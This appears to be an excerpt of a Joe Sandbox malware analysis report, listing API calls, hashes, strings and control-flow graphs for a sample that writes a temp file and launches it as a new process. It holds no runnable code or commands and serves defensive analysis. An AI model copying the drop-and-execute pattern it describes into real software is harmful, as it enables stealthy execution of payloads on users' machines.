                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$First$ApisClose
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1888877809-0
                                                                                                                                                                                                              • Opcode ID: b590c4c34fceb9e7fb107ff7a6033b81c523425884cac0f3e094cd2bca5e4f8c
                                                                                                                                                                                                              • Instruction ID: b3c260bc828ffcb932e07676c4dc7c39dcfe4b766e5cce4d6ac48d2e3a4b8a45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b590c4c34fceb9e7fb107ff7a6033b81c523425884cac0f3e094cd2bca5e4f8c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A118F32108201DBC720AF64D8959FAF7E4EF55360F104AAEE8928B1A1DF709846CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Split
                                                                                                                                                                                                              • API String ID: 0-1882502421
                                                                                                                                                                                                              • Opcode ID: fbd4e3ff1b9c6e15e1a6feab3f81a2ee1bb50334182bd1998901695344b7b0a6
                                                                                                                                                                                                              • Instruction ID: 95e2114fd78d8729b4a02951b47c529ad565cfa41c7854fda932f4bf4d297b4a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbd4e3ff1b9c6e15e1a6feab3f81a2ee1bb50334182bd1998901695344b7b0a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57221870E016099FDF24DFA8C894BEDBBF5EF58304F2480A9E905AB252D7B1AD41CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 40dd89ec2a540ef258a71555c7db5a68b3793816bf96df627c5aea1af41fd682
                                                                                                                                                                                                              • Instruction ID: fa9c6eb12b642ed872f29d5874bcfec2427fdf95bfe71f035a46cedd329ab5fb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40dd89ec2a540ef258a71555c7db5a68b3793816bf96df627c5aea1af41fd682
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79F0A032610368EBCB22C748C405E48B3E8EB05B60F110097E805EB351E6B4DE40C7C0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00BC6C78
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 00BC6C99
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 00BC6CB6
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,7A0D4CE0,00001A00,00000000,00000000), ref: 00BCB45E
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00BCB46B
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00BCB625
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BCB62F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BCB635
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFile$CreateHandleTemp$ChangeFindNameNotificationPathProcessWrite
                                                                                                                                                                                                              • String ID: >_,$4$#(*f$+2*$6>m$7Bb1$A=V$BMh$BQ&$C$CQ&$Ey#)$G$GU"$KY.$MXJ$N8+$WGE$]cU$_$_0$bj~9$h#P$kq.g$l$o(W;$orA$w$w$zX+$zU"$|oez$=@$Lz$[vQ$k%
                                                                                                                                                                                                              • API String ID: 2508044720-2254058905
                                                                                                                                                                                                              • Opcode ID: 440d5ceafb787452e9dc8199cd98cbc4308fdee033a45595c6ccfa86efb9378e
                                                                                                                                                                                                              • Instruction ID: 31b3f6b36ecfa0e63bf71667a30f3c0541c57ebd9b47c8295a1f7c0f02e03bf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 440d5ceafb787452e9dc8199cd98cbc4308fdee033a45595c6ccfa86efb9378e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7963A4B841E7C18AE3309F469A956DFBAE1FB92344F608A0DD1DD1B614DBB50182CF87
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 236 bc06b9-bc06f6 GetModuleHandleA GetProcAddress 237 bc071f-bc073a GlobalMemoryStatus 236->237 238 bc06f8-bc0700 GlobalMemoryStatusEx 236->238 240 bc073e-bc074e call bcbe6f 237->240 238->237 239 bc0702-bc0708 238->239 241 bc070a-bc070d 239->241 242 bc0714-bc0717 239->242 244 bc070f-bc0712 241->244 245 bc071a-bc071d 241->245 242->245 244->242 244->245 245->240
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00BC06E7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00BC06EE
                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00BC06FC
                                                                                                                                                                                                              • GlobalMemoryStatus.KERNEL32(?), ref: 00BC072A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                                                                                                                                                                                              • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                                              • API String ID: 180289352-802862622
                                                                                                                                                                                                              • Opcode ID: 44948fa042ea8342c5ec0d0edb21ee78ffda2ea5bbf677432222ccb933826e3f
                                                                                                                                                                                                              • Instruction ID: bde11fe87af517d7f6ae9258bbc059a5b6d8d9da322198ea780aec2afcdbd298
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44948fa042ea8342c5ec0d0edb21ee78ffda2ea5bbf677432222ccb933826e3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E110370920319DBDB18EFA4C8A9B9DB7F5EF04700F50849EE516A7280EB74AD00CF18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00BB2C8B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BB2C99
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00BB2CA4
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00BB2CB1
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00BB2D02
                                                                                                                                                                                                              • SetLastError.KERNEL32(000000B7,00000000,00000000), ref: 00BB2D4E
                                                                                                                                                                                                                • Part of subcall function 00BB2603: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 00BB2621
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 00BB2D67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountCurrentErrorLastTick$CreateDirectoryH_prolog3_ProcessThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3262192059-0
                                                                                                                                                                                                              • Opcode ID: e4cbede2d14efe2d8268fb457f968f72d2a8ae08ae9fbc2e24f387159e8e71df
                                                                                                                                                                                                              • Instruction ID: 7e8df96b60f4ff21656d64fe0d69b8cdc9992ed03355efb5797e2face8f46920
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4cbede2d14efe2d8268fb457f968f72d2a8ae08ae9fbc2e24f387159e8e71df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A31CF32E00214CBDF04EBA4C896BEDB7E1EF59310F1145AAE512B7292DBB04D058B65
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 281 bd2214-bd2220 282 bd22c7-bd22ca 281->282 283 bd2225-bd2236 282->283 284 bd22d0 282->284 285 bd2238-bd223b 283->285 286 bd2243-bd225c LoadLibraryExW 283->286 287 bd22d2-bd22d6 284->287 288 bd22c4 285->288 289 bd2241 285->289 290 bd22ae-bd22b7 286->290 291 bd225e-bd2267 GetLastError 286->291 288->282 293 bd22c0-bd22c2 289->293 292 bd22b9-bd22ba FreeLibrary 290->292 290->293 294 bd229e 291->294 295 bd2269-bd227b call bd18e8 291->295 292->293 293->288 296 bd22d7-bd22d9 293->296 298 bd22a0-bd22a2 294->298 295->294 301 bd227d-bd228f call bd18e8 295->301 296->287 298->290 300 bd22a4-bd22ac 298->300 300->288 301->294 304 bd2291-bd229c LoadLibraryExW 301->304 304->298
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                              • API String ID: 0-537541572
                                                                                                                                                                                                              • Opcode ID: 78628c3916726fb3f19b2367661e7fdf34217386b3126f8717f7fd073a018180
                                                                                                                                                                                                              • Instruction ID: 57b57b94bba7d7b55973f32a15dfe9bb3a4057809154f6a234f5bab007e31ed7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78628c3916726fb3f19b2367661e7fdf34217386b3126f8717f7fd073a018180
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6521C331A01255EBDB218B649C85B1AF7E8DF21770B2505A3FC15A7390FB30EE00D6E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000010B,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB28F9
                                                                                                                                                                                                              • GetLastError.KERNEL32(-0000001E,-00000046,0000002A,00000002,0000005C,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB29D5
                                                                                                                                                                                                              • GetLastError.KERNEL32(-0000001E,-00000046,0000002A,00000002,0000005C,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB29EB
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,-00000046,-0000001E,-00000046,0000002A,00000002,0000005C,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA), ref: 00BB2A0D
                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB2A2E
                                                                                                                                                                                                              • FindClose.KERNEL32(?,-00000046,0000002A,00000002,0000005C,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB2A57
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CloseFind
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2791709076-0
                                                                                                                                                                                                              • Opcode ID: 53854049f41b35538b2ae9346128edd420bdad1480f421fed3d042a80ed9e219
                                                                                                                                                                                                              • Instruction ID: 5734042e7c006f28b78fa797ad731f789f23c619741654ef5b3f174acb3ca5c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53854049f41b35538b2ae9346128edd420bdad1480f421fed3d042a80ed9e219
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11516732810218DBDF14EBA4DC62AEDB7F5BF15310F1046A9E5A2772A2DFB01A05CB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,71499961,?,?,?,?,?,?,?,?,?,?,00BD9DE9,000000FF), ref: 00BB7DA4
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00BD9DE9,000000FF), ref: 00BB7DAE
                                                                                                                                                                                                                • Part of subcall function 00BB7FB2: PostMessageA.USER32(?,00008001,00000000,00000000), ref: 00BB7FC7
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00BD9DE9,000000FF), ref: 00BB7DC4
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00BD9DE9,000000FF), ref: 00BB7DE0
                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00BB7E2C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$MessagePost__aulldiv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3743465594-0
                                                                                                                                                                                                              • Opcode ID: c69a469703f53253523381193e9649b1fa1a2d1357259ac7be9c03f518b394eb
                                                                                                                                                                                                              • Instruction ID: 963d33b38ed0553561929d6abde8b7f23d37a4238398f68ed71d09b9491c6505
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c69a469703f53253523381193e9649b1fa1a2d1357259ac7be9c03f518b394eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51415A72600208EFCB14EBA4C996EFEBBF5FF88710F00455DE546A7650EB70A904CB60
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB3138: FindClose.KERNEL32(?), ref: 00BB334D
                                                                                                                                                                                                                • Part of subcall function 00BB3138: FindClose.KERNELBASE(?,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB3545
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000002,-0000003E,00000031,-0000000A,:$DATA,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB3329
                                                                                                                                                                                                                • Part of subcall function 00BB3583: __EH_prolog3_GS.LIBCMT ref: 00BB358A
                                                                                                                                                                                                                • Part of subcall function 00BB3583: CloseHandle.KERNEL32(?,?,00000000,00000001,00000003,02000000,00000040,00BB353A,?,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB35C0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$Find$ErrorH_prolog3_HandleLast
                                                                                                                                                                                                              • String ID: :$DATA
                                                                                                                                                                                                              • API String ID: 2190039044-2587938151
                                                                                                                                                                                                              • Opcode ID: 62dc77e35dcf5fb501822ddf7ebceb57edc85977256bac4e3297f2707c2b6062
                                                                                                                                                                                                              • Instruction ID: b5e4f72a0e2b91d0eca2bae093f68354d2620b0dcaf3cd6a452980c8db295914
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62dc77e35dcf5fb501822ddf7ebceb57edc85977256bac4e3297f2707c2b6062
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1D1D470900205DBCF25EBA8C862AFEB7F1EF14B10F50869DE456A72D1EFB09A45CB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DialogBoxParamW.USER32(00000061,00000000,00BB79D2,?,?), ref: 00BC5DD5
                                                                                                                                                                                                              • DialogBoxParamA.USER32(00000061,00000000,00BB79D2,?,?), ref: 00BC5DF5
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001,Extracting,?,?,?,?,-00000086,000001E4), ref: 00BC5E2B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DialogParam$ShowWindow
                                                                                                                                                                                                              • String ID: Extracting
                                                                                                                                                                                                              • API String ID: 2809416057-356925411
                                                                                                                                                                                                              • Opcode ID: 366ff5eb92d0650c6598f4ab8c05223e7e9514636af6f067927b2d3f54b3ebd5
                                                                                                                                                                                                              • Instruction ID: 525228b475dff71aa662eabb4f17fe01cd644f71bad985b541541200b793b63a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 366ff5eb92d0650c6598f4ab8c05223e7e9514636af6f067927b2d3f54b3ebd5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C019E3128450AFBDB20AB20EC5AFADBBA1BF40710F10849AB1016B1F1DFE16D51CB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000094), ref: 00BC666E
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC6678
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Cannot open output file, xrefs: 00BC6944
                                                                                                                                                                                                              • Cannot delete output file, xrefs: 00BC68DB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID: Cannot delete output file$Cannot open output file
                                                                                                                                                                                                              • API String ID: 3168844106-3995894881
                                                                                                                                                                                                              • Opcode ID: 4d927fe24882846a20768ef846857b59341c47a71aabf3ef32635d499f6f44c7
                                                                                                                                                                                                              • Instruction ID: d457571ee7e675b3b3b466e2c1decfd3bf6754286e51c18797336103fe6f3816
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d927fe24882846a20768ef846857b59341c47a71aabf3ef32635d499f6f44c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BD16671900219EBDB24EFA4C895FEDBBF4BF08314F1085AEE515AB291DB70AD45CB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB45BC: SetEvent.KERNEL32(?,00BBEBD6,?,00BBDB41,71499961,?,?,Function_00029CA0,000000FF), ref: 00BB45BE
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000064), ref: 00BB7C13
                                                                                                                                                                                                              • LoadIconA.USER32(00000000), ref: 00BB7C2D
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00BB7C3D
                                                                                                                                                                                                              • SetTimer.USER32(?,00000003,00000064,00000000), ref: 00BB7C4B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventIconItemLoadMessageSendTimer
                                                                                                                                                                                                              • String ID:
